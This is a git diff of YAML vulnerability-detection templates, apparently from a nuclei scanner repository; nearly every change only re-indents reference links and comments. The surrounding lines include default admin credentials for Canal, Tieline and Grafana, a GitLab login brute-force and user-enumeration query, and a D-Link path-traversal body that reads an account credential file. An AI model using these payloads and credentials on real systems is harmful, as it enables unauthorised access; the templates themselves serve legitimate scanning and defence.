diff --git a/cves/2021/CVE-2021-29203.yaml b/cves/2021/CVE-2021-29203.yaml
index 8f28e7f006..0ad974afd4 100644
--- a/cves/2021/CVE-2021-29203.yaml
+++ b/cves/2021/CVE-2021-29203.yaml
@@ -6,8 +6,8 @@ info:
tags: hpe,cve,cve2021,bypass
description: A security vulnerability has been identified in the HPE Edgeline Infrastructure Manager, also known as HPE Edgeline Infrastructure Management Software, prior to version 1.22. The vulnerability could be remotely exploited to bypass remote authentication leading to execution of arbitrary commands, gaining privileged access, causing denial of service, and changing the configuration. HPE has released a software update to resolve the vulnerability in the HPE Edgeline Infrastructure Manager.
reference:
- - https://www.tenable.com/security/research/tra-2021-15
- - https://nvd.nist.gov/vuln/detail/CVE-2021-29203
+ - https://www.tenable.com/security/research/tra-2021-15
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-29203
requests:
- raw:
diff --git a/cves/2021/CVE-2021-29484.yaml b/cves/2021/CVE-2021-29484.yaml
index 1284ca92c8..51791de0f0 100644
--- a/cves/2021/CVE-2021-29484.yaml
+++ b/cves/2021/CVE-2021-29484.yaml
@@ -7,8 +7,8 @@ info:
severity: medium
tags: cve,cve2021,xss,ghost
reference:
- - https://github.com/TryGhost/Ghost/security/advisories/GHSA-9fgx-q25h-jxrg
- - https://nvd.nist.gov/vuln/detail/CVE-2021-29484
+ - https://github.com/TryGhost/Ghost/security/advisories/GHSA-9fgx-q25h-jxrg
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-29484
requests:
- method: GET
diff --git a/cves/2021/CVE-2021-3129.yaml b/cves/2021/CVE-2021-3129.yaml
index 75942eb988..6e406ccb7c 100644
--- a/cves/2021/CVE-2021-3129.yaml
+++ b/cves/2021/CVE-2021-3129.yaml
@@ -6,8 +6,8 @@ info:
severity: critical
description: Ignition before 2.5.2, as used in Laravel and other products, allows unauthenticated remote attackers to execute arbitrary code because of insecure usage of file_get_contents() and file_put_contents(). This is exploitable on sites using debug mode with Laravel before 8.4.2.
reference:
- - https://www.ambionics.io/blog/laravel-debug-rce
- - https://github.com/vulhub/vulhub/tree/master/laravel/CVE-2021-3129
+ - https://www.ambionics.io/blog/laravel-debug-rce
+ - https://github.com/vulhub/vulhub/tree/master/laravel/CVE-2021-3129
tags: cve,cve2021,laravel,rce
requests:
diff --git a/cves/2021/CVE-2021-32820.yaml b/cves/2021/CVE-2021-32820.yaml
index 0d19eb6202..3c91c1e2a2 100644
--- a/cves/2021/CVE-2021-32820.yaml
+++ b/cves/2021/CVE-2021-32820.yaml
@@ -5,8 +5,8 @@ info:
author: dhiyaneshDk
severity: medium
reference:
- - https://securitylab.github.com/advisories/GHSL-2021-018-express-handlebars/
- - https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/CVE-2021-32820.json
+ - https://securitylab.github.com/advisories/GHSL-2021-018-express-handlebars/
+ - https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/CVE-2021-32820.json
tags: cve,cve2021,expressjs,lfi
requests:
diff --git a/cves/2021/CVE-2021-3377.yaml b/cves/2021/CVE-2021-3377.yaml
index c81ada639b..77ded129f4 100644
--- a/cves/2021/CVE-2021-3377.yaml
+++ b/cves/2021/CVE-2021-3377.yaml
@@ -4,8 +4,8 @@ info:
name: Ansi_up XSS
description: The npm package ansi_up converts ANSI escape codes into HTML. In ansi_up v4, ANSI escape codes can be used to create HTML hyperlinks. Due to insufficient URL sanitization, this feature is affected by a cross-site scripting (XSS) vulnerability. This issue is fixed in v5.0.0.
reference:
- - https://doyensec.com/resources/Doyensec_Advisory_ansi_up4_XSS.pdf
- - https://github.com/drudru/ansi_up/commit/c8c726ed1db979bae4f257b7fa41775155ba2e27
+ - https://doyensec.com/resources/Doyensec_Advisory_ansi_up4_XSS.pdf
+ - https://github.com/drudru/ansi_up/commit/c8c726ed1db979bae4f257b7fa41775155ba2e27
author: geeknik
severity: medium
diff --git a/cves/2021/CVE-2021-34473.yaml b/cves/2021/CVE-2021-34473.yaml
index b3ef250c02..5a10ae6168 100644
--- a/cves/2021/CVE-2021-34473.yaml
+++ b/cves/2021/CVE-2021-34473.yaml
@@ -7,9 +7,9 @@ info:
description: |
Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-31196, CVE-2021-31206.
reference:
- - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34473
- - https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html
- - https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1
+ - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34473
+ - https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html
+ - https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1
tags: cve,cve2021,ssrf,rce,exchange
requests:
diff --git a/cves/2021/CVE-2021-35336.yaml b/cves/2021/CVE-2021-35336.yaml
index 3c5b70ca06..221dabdf34 100644
--- a/cves/2021/CVE-2021-35336.yaml
+++ b/cves/2021/CVE-2021-35336.yaml
@@ -6,8 +6,8 @@ info:
severity: critical
description: Finding the Tieline Admin Panels with default credentials.
reference:
- - https://pratikkhalane91.medium.com/use-of-default-credentials-to-unauthorised-remote-access-of-internal-panel-of-tieline-c1ffe3b3757c
- - https://nvd.nist.gov/vuln/detail/CVE-2021-35336
+ - https://pratikkhalane91.medium.com/use-of-default-credentials-to-unauthorised-remote-access-of-internal-panel-of-tieline-c1ffe3b3757c
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-35336
tags: cve,cve2021,tieline,default-login
# admin:password
diff --git a/cves/2021/CVE-2021-35464.yaml b/cves/2021/CVE-2021-35464.yaml
index b8984f1cc8..2a3107ae73 100644
--- a/cves/2021/CVE-2021-35464.yaml
+++ b/cves/2021/CVE-2021-35464.yaml
@@ -7,7 +7,7 @@ info:
severity: critical
tags: cve,cve2021,openam,rce,java
reference:
- - https://portswigger.net/research/pre-auth-rce-in-forgerock-openam-cve-2021-35464
+ - https://portswigger.net/research/pre-auth-rce-in-forgerock-openam-cve-2021-35464
requests:
- method: GET
diff --git a/default-logins/alibaba/alibaba-canal-default-password.yaml b/default-logins/alibaba/alibaba-canal-default-password.yaml
index 3009e5de43..ce8a5524c7 100644
--- a/default-logins/alibaba/alibaba-canal-default-password.yaml
+++ b/default-logins/alibaba/alibaba-canal-default-password.yaml
@@ -13,7 +13,7 @@ requests:
headers:
Content-Type: application/json
body: |
- {"username":"admin","password":"123456"}
+ {"username":"admin","password":"123456"}
matchers-condition: and
matchers:
diff --git a/default-logins/gitlab/gitlab-weak-login.yaml b/default-logins/gitlab/gitlab-weak-login.yaml
index 49b317b44e..6c73385549 100644
--- a/default-logins/gitlab/gitlab-weak-login.yaml
+++ b/default-logins/gitlab/gitlab-weak-login.yaml
@@ -18,7 +18,7 @@ requests:
gitlab_user:
- 1234
- admin
- # Enumerate valid user.
+ # Enumerate valid user.
attack: clusterbomb
diff --git a/default-logins/grafana/grafana-default-credential.yaml b/default-logins/grafana/grafana-default-credential.yaml
index 377385c534..4f7e3f3ba0 100644
--- a/default-logins/grafana/grafana-default-credential.yaml
+++ b/default-logins/grafana/grafana-default-credential.yaml
@@ -9,8 +9,8 @@ info:
- https://stackoverflow.com/questions/54039604/what-is-the-default-username-and-password-for-grafana-login-page
- https://github.com/grafana/grafana/issues/14755
- # Grafana blocks for 5 minutes after 5 "Invalid" attempts for valid user.
- # So make sure, not to attempt more than 4 password for same valid user.
+# Grafana blocks for 5 minutes after 5 "Invalid" attempts for valid user.
+# So make sure, not to attempt more than 4 password for same valid user.
requests:
@@ -42,7 +42,7 @@ requests:
{"user":"admin","password":"§grafana_password§"}
- # grafana_password will be replaced with payloads and will attempt admin:prom-operator and admin:admin
+ # grafana_password will be replaced with payloads and will attempt admin:prom-operator and admin:admin
matchers-condition: and
matchers:
diff --git a/dns/azure-takeover-detection.yaml b/dns/azure-takeover-detection.yaml
index 90151fd83a..9f966d436d 100644
--- a/dns/azure-takeover-detection.yaml
+++ b/dns/azure-takeover-detection.yaml
@@ -8,9 +8,9 @@ info:
reference:
- https://godiego.tech/posts/STO/ # kudos to @secfaults for sharing process details.
- # Update the list with more CNAMEs related to Azure
- # You need to claim the CNAME in Azure portal (https://portal.azure.com) to confirm the takeover.
- # Do not report this without claiming the CNAME.
+# Update the list with more CNAMEs related to Azure
+# You need to claim the CNAME in Azure portal (https://portal.azure.com) to confirm the takeover.
+# Do not report this without claiming the CNAME.
dns:
- name: "{{FQDN}}"
diff --git a/dns/detect-dangling-cname.yaml b/dns/detect-dangling-cname.yaml
index 2e3f547468..7f0f4ec6ea 100644
--- a/dns/detect-dangling-cname.yaml
+++ b/dns/detect-dangling-cname.yaml
@@ -6,10 +6,10 @@ info:
severity: info
tags: dns,takeover
reference:
- - https://securitytrails.com/blog/subdomain-takeover-tips
- - https://nominetcyber.com/dangling-dns-is-no-laughing-matter/
- - https://nabeelxy.medium.com/dangling-dns-records-are-a-real-vulnerability-361f2a29d37f
- - https://docs.microsoft.com/en-us/azure/security/fundamentals/subdomain-takeover
+ - https://securitytrails.com/blog/subdomain-takeover-tips
+ - https://nominetcyber.com/dangling-dns-is-no-laughing-matter/
+ - https://nabeelxy.medium.com/dangling-dns-records-are-a-real-vulnerability-361f2a29d37f
+ - https://docs.microsoft.com/en-us/azure/security/fundamentals/subdomain-takeover
dns:
- name: "{{FQDN}}"
diff --git a/exposures/apis/wadl-api.yaml b/exposures/apis/wadl-api.yaml
index 97c367ccdf..443d7a8e30 100644
--- a/exposures/apis/wadl-api.yaml
+++ b/exposures/apis/wadl-api.yaml
@@ -6,8 +6,8 @@ info:
severity: info
tags: exposure,api
reference:
- - https://github.com/dwisiswant0/wadl-dumper
- - https://www.nopsec.com/leveraging-exposed-wadl-xml-in-burp-suite/
+ - https://github.com/dwisiswant0/wadl-dumper
+ - https://www.nopsec.com/leveraging-exposed-wadl-xml-in-burp-suite/
requests:
- method: GET
diff --git a/exposures/configs/exposed-gitignore.yaml b/exposures/configs/exposed-gitignore.yaml
index b1b2a4644a..ae750dfce4 100644
--- a/exposures/configs/exposed-gitignore.yaml
+++ b/exposures/configs/exposed-gitignore.yaml
@@ -6,8 +6,8 @@ info:
severity: info
tags: config,git,exposure
reference:
- - https://twitter.com/pratiky9967/status/1230001391701086208
- - https://www.tenable.com/plugins/was/98595
+ - https://twitter.com/pratiky9967/status/1230001391701086208
+ - https://www.tenable.com/plugins/was/98595
requests:
- method: GET
diff --git a/exposures/configs/exposed-sharepoint-list.yaml b/exposures/configs/exposed-sharepoint-list.yaml
index c1bacf772a..160b2c7e10 100644
--- a/exposures/configs/exposed-sharepoint-list.yaml
+++ b/exposures/configs/exposed-sharepoint-list.yaml
@@ -5,8 +5,8 @@ info:
author: ELSFA7110
severity: low
reference:
- - https://hackerone.com/reports/761158
- - https://hackerone.com/reports/300539
+ - https://hackerone.com/reports/761158
+ - https://hackerone.com/reports/300539
tags: config,exposure,sharepoint
requests:
diff --git a/exposures/configs/qdpm-info-leak.yaml b/exposures/configs/qdpm-info-leak.yaml
index 6489c2c300..923f40f980 100644
--- a/exposures/configs/qdpm-info-leak.yaml
+++ b/exposures/configs/qdpm-info-leak.yaml
@@ -7,7 +7,7 @@ info:
severity: high
tags: qdpm,exposure
reference:
- - https://www.exploit-db.com/exploits/50176
+ - https://www.exploit-db.com/exploits/50176
requests:
- method: GET
diff --git a/fuzzing/iis-shortname.yaml b/fuzzing/iis-shortname.yaml
index bfb8e30862..802ed499db 100644
--- a/fuzzing/iis-shortname.yaml
+++ b/fuzzing/iis-shortname.yaml
@@ -7,8 +7,8 @@ info:
tags: fuzz
reference:
- - https://github.com/lijiejie/IIS_shortname_Scanner
- - https://www.exploit-db.com/exploits/19525
+ - https://github.com/lijiejie/IIS_shortname_Scanner
+ - https://www.exploit-db.com/exploits/19525
requests:
- raw:
diff --git a/headless/postmessage-tracker.yaml b/headless/postmessage-tracker.yaml
index e57ca76fa2..a091ac8494 100644
--- a/headless/postmessage-tracker.yaml
+++ b/headless/postmessage-tracker.yaml
@@ -18,33 +18,33 @@ headless:
args:
hook: true
code: |
- (function() {window.alerts = [];
+ (function() {window.alerts = [];
- function logger(found) {
- window.alerts.push(found);
+ function logger(found) {
+ window.alerts.push(found);
+ }
+
+ function getStackTrace () {
+ var stack;
+ try {
+ throw new Error('');
}
-
- function getStackTrace () {
- var stack;
- try {
- throw new Error('');
- }
- catch (error) {
- stack = error.stack || '';
- }
- stack = stack.split('\n').map(function (line) { return line.trim(); });
- return stack.splice(stack[0] == 'Error' ? 2 : 1);
+ catch (error) {
+ stack = error.stack || '';
}
+ stack = stack.split('\n').map(function (line) { return line.trim(); });
+ return stack.splice(stack[0] == 'Error' ? 2 : 1);
+ }
- var oldListener = Window.prototype.addEventListener;
+ var oldListener = Window.prototype.addEventListener;
- Window.prototype.addEventListener = function(type, listener, useCapture) {
- if(type === 'message') {
- logger(getStackTrace());
- }
- return oldListener.apply(this, arguments);
- };
- })();
+ Window.prototype.addEventListener = function(type, listener, useCapture) {
+ if(type === 'message') {
+ logger(getStackTrace());
+ }
+ return oldListener.apply(this, arguments);
+ };
+ })();
- args:
url: "{{BaseURL}}"
action: navigate
diff --git a/miscellaneous/tabnabbing-check.yaml b/miscellaneous/tabnabbing-check.yaml
index a7085d4359..b92943f34c 100644
--- a/miscellaneous/tabnabbing-check.yaml
+++ b/miscellaneous/tabnabbing-check.yaml
@@ -6,9 +6,9 @@ info:
severity: info
tags: misc
reference:
- - https://owasp.org/www-community/attacks/Reverse_Tabnabbing
- - https://www.youtube.com/watch?v=TMKZCHYmtD4
- - https://hackerone.com/reports/211065
+ - https://owasp.org/www-community/attacks/Reverse_Tabnabbing
+ - https://www.youtube.com/watch?v=TMKZCHYmtD4
+ - https://hackerone.com/reports/211065
requests:
- method: GET
diff --git a/miscellaneous/unpatched-coldfusion.yaml b/miscellaneous/unpatched-coldfusion.yaml
index 0e02a7f3ae..6458cde99d 100644
--- a/miscellaneous/unpatched-coldfusion.yaml
+++ b/miscellaneous/unpatched-coldfusion.yaml
@@ -5,8 +5,8 @@ info:
author: Daviey
severity: info
reference:
- - https://helpx.adobe.com/security/products/coldfusion/apsb21-16.html
- - https://twitter.com/Daviey/status/1374070630283415558
+ - https://helpx.adobe.com/security/products/coldfusion/apsb21-16.html
+ - https://twitter.com/Daviey/status/1374070630283415558
tags: rce,adobe,misc
requests:
diff --git a/misconfiguration/akamai-arl-xss.yaml b/misconfiguration/akamai-arl-xss.yaml
index 7fb7ddc1a7..9d1034a158 100644
--- a/misconfiguration/akamai-arl-xss.yaml
+++ b/misconfiguration/akamai-arl-xss.yaml
@@ -6,11 +6,11 @@ info:
severity: medium
tags: akamai,xss
reference:
- - https://github.com/war-and-code/akamai-arl-hack
- - https://twitter.com/SpiderSec/status/1421176297548435459
- - https://warandcode.com/post/akamai-arl-hack/
- - https://github.com/cybercdh/goarl
- - https://community.akamai.com/customers/s/article/WebPerformanceV1V2ARLChangeStartingFebruary282021?language=en_US
+ - https://github.com/war-and-code/akamai-arl-hack
+ - https://twitter.com/SpiderSec/status/1421176297548435459
+ - https://warandcode.com/post/akamai-arl-hack/
+ - https://github.com/cybercdh/goarl
+ - https://community.akamai.com/customers/s/article/WebPerformanceV1V2ARLChangeStartingFebruary282021?language=en_US
requests:
- method: GET
diff --git a/misconfiguration/exposed-service-now.yaml b/misconfiguration/exposed-service-now.yaml
index 83fbedf084..c169a53e49 100644
--- a/misconfiguration/exposed-service-now.yaml
+++ b/misconfiguration/exposed-service-now.yaml
@@ -6,8 +6,8 @@ info:
severity: info
description: detectes misconfigured Service-now ITSM instances
reference:
- - https://medium.com/@th3g3nt3l/multiple-information-exposed-due-to-misconfigured-service-now-itsm-instances-de7a303ebd56
- - https://github.com/leo-hildegarde/SnowDownKB/
+ - https://medium.com/@th3g3nt3l/multiple-information-exposed-due-to-misconfigured-service-now-itsm-instances-de7a303ebd56
+ - https://github.com/leo-hildegarde/SnowDownKB/
tags: servicenow
requests:
diff --git a/misconfiguration/gitlab/gitlab-public-repos.yaml b/misconfiguration/gitlab/gitlab-public-repos.yaml
index 7f0ed11c0f..0a2869055e 100644
--- a/misconfiguration/gitlab/gitlab-public-repos.yaml
+++ b/misconfiguration/gitlab/gitlab-public-repos.yaml
@@ -6,8 +6,8 @@ info:
severity: info
tags: gitlab
reference:
- - https://twitter.com/ldionmarcil/status/1370052344562470922
- - https://github.com/ldionmarcil/gitlab-unauth-parser
+ - https://twitter.com/ldionmarcil/status/1370052344562470922
+ - https://github.com/ldionmarcil/gitlab-unauth-parser
requests:
- method: GET
diff --git a/misconfiguration/gitlab/gitlab-public-snippets.yaml b/misconfiguration/gitlab/gitlab-public-snippets.yaml
index 61a24b4fd3..aff6a9ff43 100644
--- a/misconfiguration/gitlab/gitlab-public-snippets.yaml
+++ b/misconfiguration/gitlab/gitlab-public-snippets.yaml
@@ -5,8 +5,8 @@ info:
severity: info
tags: gitlab
reference:
- - https://gist.github.com/vysecurity/20311c29d879e0aba9dcffbe72a88b10
- - https://twitter.com/intigriti/status/1375078783338876929
+ - https://gist.github.com/vysecurity/20311c29d879e0aba9dcffbe72a88b10
+ - https://twitter.com/intigriti/status/1375078783338876929
requests:
- method: GET
diff --git a/misconfiguration/gitlab/gitlab-user-enumeration.yaml b/misconfiguration/gitlab/gitlab-user-enumeration.yaml
index 50a937dc36..9a7fb41992 100644
--- a/misconfiguration/gitlab/gitlab-user-enumeration.yaml
+++ b/misconfiguration/gitlab/gitlab-user-enumeration.yaml
@@ -14,9 +14,9 @@ requests:
headers:
Content-Type: application/json
body: |
- {
- "query":"{\nusers {\nedges {\n node {\n username\n email\n avatarUrl\n }\n }\n }\n }"
- }
+ {
+ "query":"{\nusers {\nedges {\n node {\n username\n email\n avatarUrl\n }\n }\n }\n }"
+ }
matchers-condition: and
diff --git a/misconfiguration/sap/sap-netweaver-info-leak.yaml b/misconfiguration/sap/sap-netweaver-info-leak.yaml
index 22bec165a9..f39c4f1d79 100644
--- a/misconfiguration/sap/sap-netweaver-info-leak.yaml
+++ b/misconfiguration/sap/sap-netweaver-info-leak.yaml
@@ -7,8 +7,8 @@ info:
severity: medium
tags: sap
reference:
- - https://www.acunetix.com/vulnerabilities/web/sap-icf-sap-public-info-sensitive-information-disclosure/
- - https://github.com/Jean-Francois-C/SAP-Security-Audit
+ - https://www.acunetix.com/vulnerabilities/web/sap-icf-sap-public-info-sensitive-information-disclosure/
+ - https://github.com/Jean-Francois-C/SAP-Security-Audit
requests:
- method: GET
diff --git a/misconfiguration/zabbix-dashboards-access.yaml b/misconfiguration/zabbix-dashboards-access.yaml
index b1e5ae80f7..116f3cd89b 100644
--- a/misconfiguration/zabbix-dashboards-access.yaml
+++ b/misconfiguration/zabbix-dashboards-access.yaml
@@ -6,8 +6,8 @@ info:
severity: medium
description: View dashboard with guest login.
reference:
- - https://www.exploit-db.com/ghdb/5595
- - https://packetstormsecurity.com/files/163657/zabbix5x-sqlxss.txt
+ - https://www.exploit-db.com/ghdb/5595
+ - https://packetstormsecurity.com/files/163657/zabbix5x-sqlxss.txt
tags: zabbix,unauth
requests:
diff --git a/network/deprecated-sshv1-detection.yaml b/network/deprecated-sshv1-detection.yaml
index 2b4744a079..0897da8dc9 100644
--- a/network/deprecated-sshv1-detection.yaml
+++ b/network/deprecated-sshv1-detection.yaml
@@ -7,8 +7,8 @@ info:
tags: network,ssh,openssh
description: SSHv1 is a deprecated and have known cryptographic issues.
reference:
- - https://www.kb.cert.org/vuls/id/684820
- - https://nvd.nist.gov/vuln/detail/CVE-2001-1473
+ - https://www.kb.cert.org/vuls/id/684820
+ - https://nvd.nist.gov/vuln/detail/CVE-2001-1473
network:
- host:
diff --git a/network/openssh5.3-detect.yaml b/network/openssh5.3-detect.yaml
index ece21f2b90..bd7a7338cc 100644
--- a/network/openssh5.3-detect.yaml
+++ b/network/openssh5.3-detect.yaml
@@ -7,9 +7,9 @@ info:
tags: network,openssh
description: OpenSSH 5.3 is vulnerable to username enumeraiton and DoS vulnerabilities.
reference:
- - http://seclists.org/fulldisclosure/2016/Jul/51
- - https://security-tracker.debian.org/tracker/CVE-2016-6210
- - http://openwall.com/lists/oss-security/2016/08/01/2
+ - http://seclists.org/fulldisclosure/2016/Jul/51
+ - https://security-tracker.debian.org/tracker/CVE-2016-6210
+ - http://openwall.com/lists/oss-security/2016/08/01/2
network:
- host:
diff --git a/takeovers/ceros-takeover.yaml b/takeovers/ceros-takeover.yaml
index a3eea7ead5..f39d129637 100644
--- a/takeovers/ceros-takeover.yaml
+++ b/takeovers/ceros-takeover.yaml
@@ -6,8 +6,8 @@ info:
severity: info
tags: takeover
reference:
- - https://twitter.com/abison_binoy/status/1412606224030339072
- - https://www.ceros.com/educate/help_center/using-your-own-vanity-domain/
+ - https://twitter.com/abison_binoy/status/1412606224030339072
+ - https://www.ceros.com/educate/help_center/using-your-own-vanity-domain/
requests:
- method: GET
diff --git a/technologies/detect-sentry.yaml b/technologies/detect-sentry.yaml
index 8a63c406fe..c89bc2ccda 100644
--- a/technologies/detect-sentry.yaml
+++ b/technologies/detect-sentry.yaml
@@ -6,8 +6,8 @@ info:
severity: info
tags: ssrf,sentry,tech
reference:
- - https://hackerone.com/reports/374737
- - https://twitter.com/itsecurityguard/status/1127893545619218432?lang=en
+ - https://hackerone.com/reports/374737
+ - https://twitter.com/itsecurityguard/status/1127893545619218432?lang=en
requests:
- method: GET
diff --git a/technologies/microsoft-exchange-server-detect.yaml b/technologies/microsoft-exchange-server-detect.yaml
index b89745b772..d400fe85de 100644
--- a/technologies/microsoft-exchange-server-detect.yaml
+++ b/technologies/microsoft-exchange-server-detect.yaml
@@ -6,7 +6,7 @@ info:
severity: info
reference: https://github.com/GossiTheDog/scanning/blob/main/http-vuln-exchange.nse
description: |
- Check for Exchange Server CVEs CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065,using Outlook Web App path data.
+ Check for Exchange Server CVEs CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065,using Outlook Web App path data.
requests:
- method: GET
diff --git a/technologies/waf-detect.yaml b/technologies/waf-detect.yaml
index a106e71a07..5eba810d3c 100644
--- a/technologies/waf-detect.yaml
+++ b/technologies/waf-detect.yaml
@@ -10,11 +10,11 @@ info:
requests:
- raw:
- |
- POST / HTTP/1.1
- Host: {{Hostname}}
- Content-Type: application/x-www-form-urlencoded
+ POST / HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
- _=
+ _=
matchers:
- type: regex
diff --git a/vulnerabilities/apache/apache-flink-unauth-rce.yaml b/vulnerabilities/apache/apache-flink-unauth-rce.yaml
index 9d6613cfe9..bb2304cee1 100644
--- a/vulnerabilities/apache/apache-flink-unauth-rce.yaml
+++ b/vulnerabilities/apache/apache-flink-unauth-rce.yaml
@@ -6,9 +6,9 @@ info:
severity: critical
tags: apache,flink,rce
reference:
- - https://www.exploit-db.com/exploits/48978
- - https://adamc95.medium.com/apache-flink-1-9-x-part-1-set-up-5d85fd2770f3
- - https://github.com/LandGrey/flink-unauth-rce
+ - https://www.exploit-db.com/exploits/48978
+ - https://adamc95.medium.com/apache-flink-1-9-x-part-1-set-up-5d85fd2770f3
+ - https://github.com/LandGrey/flink-unauth-rce
requests:
- raw:
diff --git a/vulnerabilities/apache/apache-solr-file-read.yaml b/vulnerabilities/apache/apache-solr-file-read.yaml
index dfe9936edd..56a6ada58d 100644
--- a/vulnerabilities/apache/apache-solr-file-read.yaml
+++ b/vulnerabilities/apache/apache-solr-file-read.yaml
@@ -6,9 +6,9 @@ info:
severity: high
tags: apache,solr,lfi
reference:
- - https://twitter.com/Al1ex4/status/1382981479727128580
- - https://nsfocusglobal.com/apache-solr-arbitrary-file-read-and-ssrf-vulnerability-threat-alert/
- - https://twitter.com/sec715/status/1373472323538362371
+ - https://twitter.com/Al1ex4/status/1382981479727128580
+ - https://nsfocusglobal.com/apache-solr-arbitrary-file-read-and-ssrf-vulnerability-threat-alert/
+ - https://twitter.com/sec715/status/1373472323538362371
requests:
- raw:
diff --git a/vulnerabilities/generic/cache-poisoning.yaml b/vulnerabilities/generic/cache-poisoning.yaml
index 7b9022bf80..fa843b73a4 100644
--- a/vulnerabilities/generic/cache-poisoning.yaml
+++ b/vulnerabilities/generic/cache-poisoning.yaml
@@ -5,8 +5,8 @@ info:
author: melbadry9,xelkomy
severity: info
reference:
- - https://blog.melbadry9.xyz/fuzzing/nuclei-cache-poisoning
- - https://portswigger.net/research/practical-web-cache-poisoning
+ - https://blog.melbadry9.xyz/fuzzing/nuclei-cache-poisoning
+ - https://portswigger.net/research/practical-web-cache-poisoning
tags: cache,generic
requests:
diff --git a/vulnerabilities/lsoft/listserv_maestro_rce.yaml b/vulnerabilities/lsoft/listserv_maestro_rce.yaml
index 40ac26b75f..93b0ddba80 100644
--- a/vulnerabilities/lsoft/listserv_maestro_rce.yaml
+++ b/vulnerabilities/lsoft/listserv_maestro_rce.yaml
@@ -6,8 +6,8 @@ info:
severity: info
description: CVE-2010-1870 Struts based OGNL remote code execution in ListSERV Maestro before and including version 9.0-8.
reference:
- - https://www.securifera.com/advisories/sec-2020-0001/
- - https://packetstormsecurity.com/files/159643/listservmaestro-exec.txt
+ - https://www.securifera.com/advisories/sec-2020-0001/
+ - https://packetstormsecurity.com/files/159643/listservmaestro-exec.txt
requests:
- method: GET
diff --git a/vulnerabilities/oracle/oracle-ebs-xss.yaml b/vulnerabilities/oracle/oracle-ebs-xss.yaml
index 0ec5474ea2..b684437823 100644
--- a/vulnerabilities/oracle/oracle-ebs-xss.yaml
+++ b/vulnerabilities/oracle/oracle-ebs-xss.yaml
@@ -6,9 +6,9 @@ info:
severity: medium
tags: oracle,xss,ebs
reference:
- - https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-4.pdf
- - https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite.pdf
- - http://www.davidlitchfield.com/AssessingOraclee-BusinessSuite11i.pdf
+ - https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-4.pdf
+ - https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite.pdf
+ - http://www.davidlitchfield.com/AssessingOraclee-BusinessSuite11i.pdf
requests:
- method: GET
diff --git a/vulnerabilities/other/buffalo-config-injection.yaml b/vulnerabilities/other/buffalo-config-injection.yaml
index 5c7a5ce8c2..ba678d6928 100644
--- a/vulnerabilities/other/buffalo-config-injection.yaml
+++ b/vulnerabilities/other/buffalo-config-injection.yaml
@@ -7,9 +7,9 @@ info:
description: |
The web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 do not properly sanitize user input. An authenticated remote attacker could leverage this vulnerability to alter device configuration, potentially gaining remote code execution.
reference:
- - https://blogs.juniper.net/en-us/security/freshly-disclosed-vulnerability-cve-2021-20090-exploited-in-the-wild
- - https://www.tenable.com/security/research/tra-2021-13
- - https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2
+ - https://blogs.juniper.net/en-us/security/freshly-disclosed-vulnerability-cve-2021-20090-exploited-in-the-wild
+ - https://www.tenable.com/security/research/tra-2021-13
+ - https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2
tags: buffalo,firmware,iot
requests:
diff --git a/vulnerabilities/other/concrete-xss.yaml b/vulnerabilities/other/concrete-xss.yaml
index 44e6d5fa62..57ec254a12 100644
--- a/vulnerabilities/other/concrete-xss.yaml
+++ b/vulnerabilities/other/concrete-xss.yaml
@@ -7,9 +7,9 @@ info:
severity: medium
tags: concrete,xss,cms
reference:
- - https://hackerone.com/reports/643442
- - https://github.com/concrete5/concrete5/pull/7999
- - https://twitter.com/JacksonHHax/status/1389222207805661187
+ - https://hackerone.com/reports/643442
+ - https://github.com/concrete5/concrete5/pull/7999
+ - https://twitter.com/JacksonHHax/status/1389222207805661187
requests:
- method: GET
diff --git a/vulnerabilities/other/dlink-850L-info-leak.yaml b/vulnerabilities/other/dlink-850L-info-leak.yaml
index 254efe51b6..6d3d77235f 100644
--- a/vulnerabilities/other/dlink-850L-info-leak.yaml
+++ b/vulnerabilities/other/dlink-850L-info-leak.yaml
@@ -12,7 +12,7 @@ requests:
path:
- "{{BaseURL}}/hedwig.cgi"
body: |
- ../../../htdocs/webinc/getcfg/DEVICE.ACCOUNT.xml
+ ../../../htdocs/webinc/getcfg/DEVICE.ACCOUNT.xml
headers:
Cookie: uid=R8tBjwtFc8
Content-Type: text/xml
diff --git a/vulnerabilities/other/maian-cart-preauth-rce.yaml b/vulnerabilities/other/maian-cart-preauth-rce.yaml
index 03dc459bca..d9a923a421 100644
--- a/vulnerabilities/other/maian-cart-preauth-rce.yaml
+++ b/vulnerabilities/other/maian-cart-preauth-rce.yaml
@@ -6,9 +6,9 @@ info:
severity: critical
description: A severe vulnerability has been kindly reported to me by security advisor DreyAnd. The issue concerns the elFinder file manager plugin in Maian Cart and it affects all versions from 3.0 to 3.8.
reference:
- - https://dreyand.github.io/maian-cart-rce/
- - https://github.com/DreyAnd/maian-cart-rce
- - https://www.maianscriptworld.co.uk/critical-updates
+ - https://dreyand.github.io/maian-cart-rce/
+ - https://github.com/DreyAnd/maian-cart-rce
